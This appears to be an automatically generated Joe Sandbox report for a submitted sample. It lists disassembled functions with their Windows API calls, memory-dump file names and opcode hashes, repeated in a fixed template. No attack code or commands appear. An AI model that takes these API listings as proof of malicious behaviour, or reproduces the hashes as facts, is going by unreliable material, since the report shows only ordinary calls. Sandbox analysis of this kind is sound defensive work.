SetWindowLongW.USER32(?,000000EC,00000000), ref: 00272824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00272832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00272840

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 47606a291624e60a1c9d0f9eab46ae7fa5b227651471da3444e454de48e0ba4e
Instruction ID: 71d361fcb6949f4ca40b50c062baded40caa659a90e662088e3b1dc4c8dee5f0
Opcode Fuzzy Hash: 47606a291624e60a1c9d0f9eab46ae7fa5b227651471da3444e454de48e0ba4e
Instruction Fuzzy Hash: 6021C431214511EFD7149F24D844F6ABB95EF45324F24815CF42A8B6D2C772FC96CB91

Function 002478F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00248D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?), ref: 00248D8C
Part of subcall function 00248D7D: lstrcpyW.KERNEL32(00000000,?,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00248DB2
Part of subcall function 00248D7D: lstrcmpiW.KERNEL32(00000000,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?), ref: 00248DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247923
lstrcpyW.KERNEL32(00000000,?,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247984

Strings

cdecl, xrefs: 0024797B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 31f303c77f3a4d035a6b0888a8909fdb8f14f74003600cfea58cf8938a1bdcc8
Instruction ID: 0225222e4c22d189a8b910a4ee64508c1a655dcbe655485394ba2303c02c5077
Opcode Fuzzy Hash: 31f303c77f3a4d035a6b0888a8909fdb8f14f74003600cfea58cf8938a1bdcc8
Instruction Fuzzy Hash: 4111E63A210342ABCB199F38D849D7B77A9FF95350B50402EF94AC72A4EF719861C7A1

Function 00277CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00277D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00277D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00277D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0025B7AD,00000000), ref: 00277D6B

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: c818074d84524ade7d5202bfcb361da257bbd6a6d942d9540a418b75c9cd572e
Instruction ID: 7f1995c8062583a4bb3eb4bcc566b869e8de684572ed7df8f2ce12cc4ec401dc
Opcode Fuzzy Hash: c818074d84524ade7d5202bfcb361da257bbd6a6d942d9540a418b75c9cd572e
Instruction Fuzzy Hash: 2711A231524656AFCB209F68DC08AA63BA5AF45360B658728F83DD72F0D73199B0CB90

Function 00275660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002756BB
_wcslen.LIBCMT ref: 002756CD
_wcslen.LIBCMT ref: 002756D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00275816

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 863314a291853bb11df4e4d339726ee41be71d65af4ef41f1867b5359a115075
Instruction ID: e98f89db0aaf5a23700c8fae33596e65172978ae70801a73e69f0a98c0b14a2f
Opcode Fuzzy Hash: 863314a291853bb11df4e4d339726ee41be71d65af4ef41f1867b5359a115075
Instruction Fuzzy Hash: 9D11D671A2062996DB209F61DC85AEEB76CFF11760F50C02AFA1DD6081E7F0D9A4CF60

Function 00241A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00241A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A8A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 536537075adeba94301104a3373fdff578011f1c25b28de84cc7d18b54d8a844
Instruction ID: 56900116b5cc66aed54fb0cabde2562ad2707fed74a97057d40b98c24d711274
Opcode Fuzzy Hash: 536537075adeba94301104a3373fdff578011f1c25b28de84cc7d18b54d8a844
Instruction Fuzzy Hash: 08117C3AD01229FFEB10DBA4CD84FADBB78EB04350F200091E600B7290C6716E60DB94

Function 0024E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0024E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0024E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0024E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0024E24D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 1068ea52b5198ace467a7ef81735ee670e9a79e7919a563717aa5f4d19de9c49
Instruction ID: 200a4bade8adaedac63aae42ea7c030fdf3c77943b561df095d088ec87f5bb1f
Opcode Fuzzy Hash: 1068ea52b5198ace467a7ef81735ee670e9a79e7919a563717aa5f4d19de9c49
Instruction Fuzzy Hash: 3B11E172914214ABDB05DFB8AC09AAA7BACAB45320F514369FD29E3291D6B08D1087A0

Function 0020D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0020CFF9,00000000,00000004,00000000), ref: 0020D218
GetLastError.KERNEL32 ref: 0020D224
__dosmaperr.LIBCMT ref: 0020D22B
ResumeThread.KERNEL32(00000000), ref: 0020D249

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f9ed44c58abc6666bcf757e3d12180c17a574c026bb3a31fd47a57d1e5aaeb14
Instruction ID: f248f761cc44c85efa7e65e7ede7c675f879981fbc0c617e5b8617b44f8eebcd
Opcode Fuzzy Hash: f9ed44c58abc6666bcf757e3d12180c17a574c026bb3a31fd47a57d1e5aaeb14
Instruction Fuzzy Hash: F901C436426305BFD7216FF5DC09BAA7A69DF81730F200219FD29961D2CF7089618AA0

Function 001E600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
GetStockObject.GDI32(00000011), ref: 001E6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 44ffbdcd7288078bea5d4c8b23aa535f70cb4bb220996971203e877613b132e2
Instruction ID: 831651233c0b1fd7833c3aa1efca1dc1e2cd5d1bc1e6e6aa1a5e064c399737f7
Opcode Fuzzy Hash: 44ffbdcd7288078bea5d4c8b23aa535f70cb4bb220996971203e877613b132e2
Instruction Fuzzy Hash: B011A172101958BFEF165FA59C48EEEBB6DEF183A4F500215FA0452010C736ACA0DB90

Function 00203B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00203B56

Part of subcall function 00203AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00203AD2
Part of subcall function 00203AA3: ___AdjustPointer.LIBCMT ref: 00203AED

_UnwindNestedFrames.LIBCMT ref: 00203B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00203B7C
CallCatchBlock.LIBVCRUNTIME ref: 00203BA4

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 2afed227d9d5d13f55b9eb5217e466f522ad7100fb394624e59c67db20acdbf0
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 13012972110249BBDF12AE95CC42EEB3B6EEF88758F048414FE4856162C732E971DFA0

Function 00213073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001E13C6,00000000,00000000,?,0021301A,001E13C6,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue), ref: 002130A5
GetLastError.KERNEL32(?,0021301A,001E13C6,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue,00282290,FlsSetValue,00000000,00000364,?,00212E46), ref: 002130B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0021301A,001E13C6,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue,00282290,FlsSetValue,00000000), ref: 002130BF

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 28f82d8de8c11702d489765979e9964114370c85fb4e05776e2ffc7d390aec48
Instruction ID: a3c998a2bfa7176f8fb1ad8b139f6a00000438a30609060063e3ccd99b1d414a
Opcode Fuzzy Hash: 28f82d8de8c11702d489765979e9964114370c85fb4e05776e2ffc7d390aec48
Instruction Fuzzy Hash: 0901D832331623ABC7218E79AC489977BD99F59761B210634F909E3140DB21D991C7E0

Function 00247464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0024747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00247497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002474AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002474CA

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 3b1beaea7a128dc51b6c3d52e1912a0e33eb89dde6a64422d73f94a21f6f12b0
Instruction ID: c53c4e21ceb3c25d67f70deb2c3c71203dc9e02b362ed981fd8f37730d15a688
Opcode Fuzzy Hash: 3b1beaea7a128dc51b6c3d52e1912a0e33eb89dde6a64422d73f94a21f6f12b0
Instruction Fuzzy Hash: 0411A1B52153119BF7208F24EC0CBA37BFCEB00B00F10856DA62AD6151D7B0E954DBA0

Function 0024B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B126

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ebacbda30854af48f78ec15881ba3df809babe539ed432f7b18b6300cc164f9b
Instruction ID: bb5a5a2c7e28396b33a94c6e6b3ea6f150d98914607327a8d010f481e3baab61
Opcode Fuzzy Hash: ebacbda30854af48f78ec15881ba3df809babe539ed432f7b18b6300cc164f9b
Instruction Fuzzy Hash: FF116D31C2152DE7CF09AFE4E9586EEBB78FF09711F104099D949B6181CB709660CB51

Function 00242DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00242DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00242DD6
GetCurrentThreadId.KERNEL32 ref: 00242DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00242DE4

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: dca97081fb6a77865ddf732d84b4b4af608b596ff3b973345b075200331bf12c
Instruction ID: a0ae8596ab72ea48bb597b62ec9b4b6f4897f5a6aa3ac47b181427d7928ad1b4
Opcode Fuzzy Hash: dca97081fb6a77865ddf732d84b4b4af608b596ff3b973345b075200331bf12c
Instruction Fuzzy Hash: 34E06D71511225FAD7242B73AC4EEEB7E6CEB83BA1F900029F109D10809AA48884C6B0

Function 00278863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 001F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96A2
Part of subcall function 001F9639: BeginPath.GDI32(?), ref: 001F96B9
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00278887
LineTo.GDI32(?,?,?), ref: 00278894
EndPath.GDI32(?), ref: 002788A4
StrokePath.GDI32(?), ref: 002788B2

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d93793f2f49fc3f8be0e9fbb42c48cc64209359f99166b623ac0aea5b79b3710
Instruction ID: a5d2181d7681f543b03cfa994d0874ec238efe1c8709c75be2b6699ff1c6ab4f
Opcode Fuzzy Hash: d93793f2f49fc3f8be0e9fbb42c48cc64209359f99166b623ac0aea5b79b3710
Instruction Fuzzy Hash: FAF03A36041699BADB126FA4AC0DFCA3E59AF06310F548104FA15650E1C7755561CBE5

Function 001F98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001F98CC
SetTextColor.GDI32(?,?), ref: 001F98D6
SetBkMode.GDI32(?,00000001), ref: 001F98E9
GetStockObject.GDI32(00000005), ref: 001F98F1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 478a8c392499d8796d0c1490999cf420031e6438dc142f8d2d7e7825424722c4
Instruction ID: 93c15d6416793c155bdbf43f5f13427bbab7fbfc4f9a935c496d1a0cfaa07f8d
Opcode Fuzzy Hash: 478a8c392499d8796d0c1490999cf420031e6438dc142f8d2d7e7825424722c4
Instruction Fuzzy Hash: 2EE03971244284AADF215B74BC0DBE93B20AB12336F648229F6BE580E1C3B246909B10

Function 0024162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00241634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002411D9), ref: 0024163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002411D9), ref: 00241648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002411D9), ref: 0024164F

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 61c7478aeabc91fe3d8e2cf987ea20f5903b62d2cb8bfd9cf0f9efe128e4b604
Instruction ID: d2f16e34d7ab1c07b6182d34b23edf25c67b7b31950e467fc641892a0ce63b10
Opcode Fuzzy Hash: 61c7478aeabc91fe3d8e2cf987ea20f5903b62d2cb8bfd9cf0f9efe128e4b604
Instruction Fuzzy Hash: 0AE08C32602222EBD7202FB0BE0DB863B7CAF44792F25884CF749D9090E63484D0CBA4

Function 0023D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0023D858
GetDC.USER32(00000000), ref: 0023D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023D882
ReleaseDC.USER32(?), ref: 0023D8A3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3635aed65a872f002324c1204818f7be829f60f571b93d73147c45a00f8eceb0
Instruction ID: ff9485101178d295ab4bd3b8d73ca71184ea786f90a234e7d61a03e1f208832f
Opcode Fuzzy Hash: 3635aed65a872f002324c1204818f7be829f60f571b93d73147c45a00f8eceb0
Instruction Fuzzy Hash: E6E01AB0800204DFCB41AFB1E84C66DBBB6FB48310F208009F91AE7250CB385982AF40

Function 0023D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0023D86C
GetDC.USER32(00000000), ref: 0023D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0023D882
